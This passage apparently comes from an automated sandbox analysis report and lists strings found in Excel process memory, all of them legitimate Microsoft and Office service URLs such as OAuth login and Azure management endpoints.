Source: EXCEL.EXE, 00000000.00000003.956277034.000000001341D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.812788493.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869082822.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869306077.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965884152.0000000013428000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.957395069.0000000013426000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870183051.0000000013400000.00000004.00000001.sdmp String found in binary or memory: https://login.windows.net/common/oauth2/authorize.
Source: EXCEL.EXE, 00000000.00000003.956277034.000000001341D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.812788493.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869082822.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869306077.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965884152.0000000013428000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.957395069.0000000013426000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870183051.0000000013400000.00000004.00000001.sdmp String found in binary or memory: https://login.windows.net/common/oauth2/authorize/
Source: EXCEL.EXE, 00000000.00000002.965380107.0000000013197000.00000004.00000001.sdmp String found in binary or memory: https://login.windows.net/common/oauth2/authorize018
Source: EXCEL.EXE, 00000000.00000002.962261125.000000000DDDF000.00000004.00000001.sdmp String found in binary or memory: https://login.windows.net/common/oauth2/authorize1x
Source: EXCEL.EXE, 00000000.00000003.956277034.000000001341D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.812788493.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869082822.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869306077.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965884152.0000000013428000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.957395069.0000000013426000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870183051.0000000013400000.00000004.00000001.sdmp String found in binary or memory: https://login.windows.net/common/oauth2/authorize3
Source: EXCEL.EXE, 00000000.00000002.965471878.00000000131EE000.00000004.00000001.sdmp String found in binary or memory: https://login.windows.net/common/oauth2/authorize8
Source: EXCEL.EXE, 00000000.00000003.956277034.000000001341D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.812788493.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869082822.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869306077.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965884152.0000000013428000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965471878.00000000131EE000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.957395069.0000000013426000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870183051.0000000013400000.00000004.00000001.sdmp String found in binary or memory: https://login.windows.net/common/oauth2/authorize9
Source: EXCEL.EXE, 00000000.00000002.965471878.00000000131EE000.00000004.00000001.sdmp String found in binary or memory: https://login.windows.net/common/oauth2/authorize:
Source: EXCEL.EXE, 00000000.00000003.956277034.000000001341D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.812788493.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869082822.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869306077.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965884152.0000000013428000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.957395069.0000000013426000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870183051.0000000013400000.00000004.00000001.sdmp String found in binary or memory: https://login.windows.net/common/oauth2/authorize=
Source: EXCEL.EXE, 00000000.00000002.965471878.00000000131EE000.00000004.00000001.sdmp String found in binary or memory: https://login.windows.net/common/oauth2/authorize?
Source: EXCEL.EXE, 00000000.00000003.956277034.000000001341D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.812788493.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869082822.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869306077.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965884152.0000000013428000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.957395069.0000000013426000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870183051.0000000013400000.00000004.00000001.sdmp String found in binary or memory: https://login.windows.net/common/oauth2/authorizeD
Source: EXCEL.EXE, 00000000.00000003.956277034.000000001341D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.812788493.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869082822.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869306077.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965884152.0000000013428000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.957395069.0000000013426000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870183051.0000000013400000.00000004.00000001.sdmp String found in binary or memory: https://login.windows.net/common/oauth2/authorizeE
Source: EXCEL.EXE, 00000000.00000002.965471878.00000000131EE000.00000004.00000001.sdmp String found in binary or memory: https://login.windows.net/common/oauth2/authorizeF
Source: EXCEL.EXE, 00000000.00000003.956277034.000000001341D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.812788493.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869082822.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869306077.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965884152.0000000013428000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.957395069.0000000013426000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870183051.0000000013400000.00000004.00000001.sdmp String found in binary or memory: https://login.windows.net/common/oauth2/authorizeG
Source: EXCEL.EXE, 00000000.00000003.956277034.000000001341D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.812788493.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869082822.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869306077.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965884152.0000000013428000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.957395069.0000000013426000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870183051.0000000013400000.00000004.00000001.sdmp String found in binary or memory: https://login.windows.net/common/oauth2/authorizeH
Source: EXCEL.EXE, 00000000.00000003.956277034.000000001341D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.812788493.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869082822.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869306077.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965884152.0000000013428000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.957395069.0000000013426000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870183051.0000000013400000.00000004.00000001.sdmp String found in binary or memory: https://login.windows.net/common/oauth2/authorizeJ
Source: EXCEL.EXE, 00000000.00000003.956277034.000000001341D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.812788493.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869082822.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869306077.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965884152.0000000013428000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.957395069.0000000013426000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870183051.0000000013400000.00000004.00000001.sdmp String found in binary or memory: https://login.windows.net/common/oauth2/authorizeK
Source: EXCEL.EXE, 00000000.00000003.956277034.000000001341D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.812788493.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869082822.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869306077.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965884152.0000000013428000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.957395069.0000000013426000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870183051.0000000013400000.00000004.00000001.sdmp String found in binary or memory: https://login.windows.net/common/oauth2/authorizeO
Source: EXCEL.EXE, 00000000.00000003.956277034.000000001341D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.812788493.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869082822.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869306077.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965884152.0000000013428000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965471878.00000000131EE000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.957395069.0000000013426000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870183051.0000000013400000.00000004.00000001.sdmp String found in binary or memory: https://login.windows.net/common/oauth2/authorizeP
Source: EXCEL.EXE, 00000000.00000003.956277034.000000001341D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.812788493.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869082822.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869306077.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965884152.0000000013428000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.957395069.0000000013426000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870183051.0000000013400000.00000004.00000001.sdmp String found in binary or memory: https://login.windows.net/common/oauth2/authorizePfT
Source: EXCEL.EXE, 00000000.00000002.965471878.00000000131EE000.00000004.00000001.sdmp String found in binary or memory: https://login.windows.net/common/oauth2/authorizeQ
Source: EXCEL.EXE, 00000000.00000003.956277034.000000001341D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.812788493.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869082822.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869306077.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965884152.0000000013428000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.957395069.0000000013426000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870183051.0000000013400000.00000004.00000001.sdmp String found in binary or memory: https://login.windows.net/common/oauth2/authorizeQgk
Source: EXCEL.EXE, 00000000.00000002.965471878.00000000131EE000.00000004.00000001.sdmp String found in binary or memory: https://login.windows.net/common/oauth2/authorizeR
Source: EXCEL.EXE, 00000000.00000003.956277034.000000001341D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.812788493.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869082822.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869306077.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965884152.0000000013428000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.957395069.0000000013426000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870183051.0000000013400000.00000004.00000001.sdmp String found in binary or memory: https://login.windows.net/common/oauth2/authorizeU
Source: EXCEL.EXE, 00000000.00000002.965471878.00000000131EE000.00000004.00000001.sdmp String found in binary or memory: https://login.windows.net/common/oauth2/authorizeV
Source: EXCEL.EXE, 00000000.00000003.956277034.000000001341D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.812788493.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869082822.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869306077.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965884152.0000000013428000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.957395069.0000000013426000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870183051.0000000013400000.00000004.00000001.sdmp String found in binary or memory: https://login.windows.net/common/oauth2/authorizeX
Source: EXCEL.EXE, 00000000.00000003.956277034.000000001341D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.812788493.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869082822.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869306077.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965884152.0000000013428000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.957395069.0000000013426000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870183051.0000000013400000.00000004.00000001.sdmp String found in binary or memory: https://login.windows.net/common/oauth2/authorizeY
Source: EXCEL.EXE, 00000000.00000002.965471878.00000000131EE000.00000004.00000001.sdmp String found in binary or memory: https://login.windows.net/common/oauth2/authorizecom
Source: EXCEL.EXE, 00000000.00000003.956277034.000000001341D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.812788493.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869082822.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869306077.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965884152.0000000013428000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.957395069.0000000013426000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870183051.0000000013400000.00000004.00000001.sdmp String found in binary or memory: https://login.windows.net/common/oauth2/authorized
Source: EXCEL.EXE, 00000000.00000003.956277034.000000001341D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.812788493.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869082822.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869306077.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965884152.0000000013428000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965471878.00000000131EE000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.957395069.0000000013426000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870183051.0000000013400000.00000004.00000001.sdmp String found in binary or memory: https://login.windows.net/common/oauth2/authorizee
Source: EXCEL.EXE, 00000000.00000003.956277034.000000001341D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.812788493.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869082822.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869306077.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965884152.0000000013428000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.957395069.0000000013426000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870183051.0000000013400000.00000004.00000001.sdmp String found in binary or memory: https://login.windows.net/common/oauth2/authorizefg
Source: EXCEL.EXE, 00000000.00000002.965471878.00000000131EE000.00000004.00000001.sdmp String found in binary or memory: https://login.windows.net/common/oauth2/authorizefic
Source: EXCEL.EXE, 00000000.00000003.956277034.000000001341D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.812788493.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869082822.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869306077.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965884152.0000000013428000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.957395069.0000000013426000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870183051.0000000013400000.00000004.00000001.sdmp String found in binary or memory: https://login.windows.net/common/oauth2/authorizeh
Source: EXCEL.EXE, 00000000.00000003.956277034.000000001341D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.812788493.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869082822.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869306077.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965884152.0000000013428000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.957395069.0000000013426000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870183051.0000000013400000.00000004.00000001.sdmp String found in binary or memory: https://login.windows.net/common/oauth2/authorizei
Source: EXCEL.EXE, 00000000.00000002.965471878.00000000131EE000.00000004.00000001.sdmp String found in binary or memory: https://login.windows.net/common/oauth2/authorizeize
Source: EXCEL.EXE, 00000000.00000002.965471878.00000000131EE000.00000004.00000001.sdmp String found in binary or memory: https://login.windows.net/common/oauth2/authorizeized
Source: EXCEL.EXE, 00000000.00000003.956277034.000000001341D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.812788493.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869082822.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869306077.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965884152.0000000013428000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965471878.00000000131EE000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.957395069.0000000013426000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870183051.0000000013400000.00000004.00000001.sdmp String found in binary or memory: https://login.windows.net/common/oauth2/authorizej
Source: EXCEL.EXE, 00000000.00000003.956277034.000000001341D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.812788493.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869082822.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869306077.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965884152.0000000013428000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.957395069.0000000013426000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870183051.0000000013400000.00000004.00000001.sdmp String found in binary or memory: https://login.windows.net/common/oauth2/authorizen
Source: EXCEL.EXE, 00000000.00000003.956277034.000000001341D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.812788493.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869082822.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869306077.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965884152.0000000013428000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.957395069.0000000013426000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870183051.0000000013400000.00000004.00000001.sdmp String found in binary or memory: https://login.windows.net/common/oauth2/authorizenh
Source: EXCEL.EXE, 00000000.00000003.956277034.000000001341D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.812788493.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869082822.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869306077.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965884152.0000000013428000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.957395069.0000000013426000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870183051.0000000013400000.00000004.00000001.sdmp String found in binary or memory: https://login.windows.net/common/oauth2/authorizeo
Source: EXCEL.EXE, 00000000.00000002.965471878.00000000131EE000.00000004.00000001.sdmp String found in binary or memory: https://login.windows.net/common/oauth2/authorizep
Source: EXCEL.EXE, 00000000.00000003.956277034.000000001341D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.812788493.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869082822.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869306077.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965884152.0000000013428000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965471878.00000000131EE000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.957395069.0000000013426000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870183051.0000000013400000.00000004.00000001.sdmp String found in binary or memory: https://login.windows.net/common/oauth2/authorizet
Source: EXCEL.EXE, 00000000.00000003.956277034.000000001341D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.812788493.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869082822.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869306077.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965884152.0000000013428000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.957395069.0000000013426000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870183051.0000000013400000.00000004.00000001.sdmp String found in binary or memory: https://login.windows.net/common/oauth2/authorizete
Source: EXCEL.EXE, 00000000.00000003.956277034.000000001341D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.812788493.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869082822.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869306077.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965884152.0000000013428000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965471878.00000000131EE000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.957395069.0000000013426000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870183051.0000000013400000.00000004.00000001.sdmp String found in binary or memory: https://login.windows.net/common/oauth2/authorizeu
Source: EXCEL.EXE, 00000000.00000003.956277034.000000001341D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.812788493.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869082822.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869306077.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965884152.0000000013428000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.957395069.0000000013426000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870183051.0000000013400000.00000004.00000001.sdmp String found in binary or memory: https://login.windows.net/common/oauth2/authorizevfv
Source: EXCEL.EXE, 00000000.00000002.965471878.00000000131EE000.00000004.00000001.sdmp String found in binary or memory: https://login.windows.net/common/oauth2/authorizew
Source: EXCEL.EXE, 00000000.00000003.956277034.000000001341D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.812788493.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869082822.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869306077.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965884152.0000000013428000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965471878.00000000131EE000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.957395069.0000000013426000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870183051.0000000013400000.00000004.00000001.sdmp String found in binary or memory: https://login.windows.net/common/oauth2/authorizex
Source: EXCEL.EXE, 00000000.00000003.956277034.000000001341D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.812788493.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869082822.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869306077.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965884152.0000000013428000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.957395069.0000000013426000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870183051.0000000013400000.00000004.00000001.sdmp String found in binary or memory: https://login.windows.net/common/oauth2/authorizey
Source: EXCEL.EXE, 00000000.00000003.956277034.000000001341D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.812788493.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869082822.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869306077.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965884152.0000000013428000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.957395069.0000000013426000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870183051.0000000013400000.00000004.00000001.sdmp String found in binary or memory: https://login.windows.net/common/oauth2/authorizez
Source: EXCEL.EXE, 00000000.00000003.956277034.000000001341D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.812788493.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869082822.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869306077.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965884152.0000000013428000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.957395069.0000000013426000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870183051.0000000013400000.00000004.00000001.sdmp, 7C0D527C-5EBC-4E38-99DF-FD6E1F5E260F.0.dr String found in binary or memory: https://loki.delve.office.com/api/v1/configuration/officewin32/
Source: EXCEL.EXE, 00000000.00000003.956277034.000000001341D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.812788493.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869082822.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869306077.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965884152.0000000013428000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.957395069.0000000013426000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870183051.0000000013400000.00000004.00000001.sdmp, 7C0D527C-5EBC-4E38-99DF-FD6E1F5E260F.0.dr String found in binary or memory: https://lookup.onenote.com/lookup/geolocation/v1
Source: 7C0D527C-5EBC-4E38-99DF-FD6E1F5E260F.0.dr String found in binary or memory: https://management.azure.com
Source: 7C0D527C-5EBC-4E38-99DF-FD6E1F5E260F.0.dr String found in binary or memory: https://management.azure.com/
Source: EXCEL.EXE, 00000000.00000003.956277034.000000001341D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.812788493.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869082822.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869306077.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965884152.0000000013428000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.957395069.0000000013426000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870183051.0000000013400000.00000004.00000001.sdmp String found in binary or memory: https://management.azure.com/t
Source: EXCEL.EXE, 00000000.00000003.956277034.000000001341D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.812788493.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869082822.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869306077.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965884152.0000000013428000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.957395069.0000000013426000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870183051.0000000013400000.00000004.00000001.sdmp String found in binary or memory: https://management.azure.comv
Source: EXCEL.EXE, 00000000.00000003.870183051.0000000013400000.00000004.00000001.sdmp, 7C0D527C-5EBC-4E38-99DF-FD6E1F5E260F.0.dr String found in binary or memory: https://messaging.office.com/
Source: EXCEL.EXE, 00000000.00000003.956277034.000000001341D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.812788493.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869082822.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869306077.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965884152.0000000013428000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.957395069.0000000013426000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870183051.0000000013400000.00000004.00000001.sdmp, 7C0D527C-5EBC-4E38-99DF-FD6E1F5E260F.0.dr String found in binary or memory: https://metadata.templates.cdn.office.net/client/log
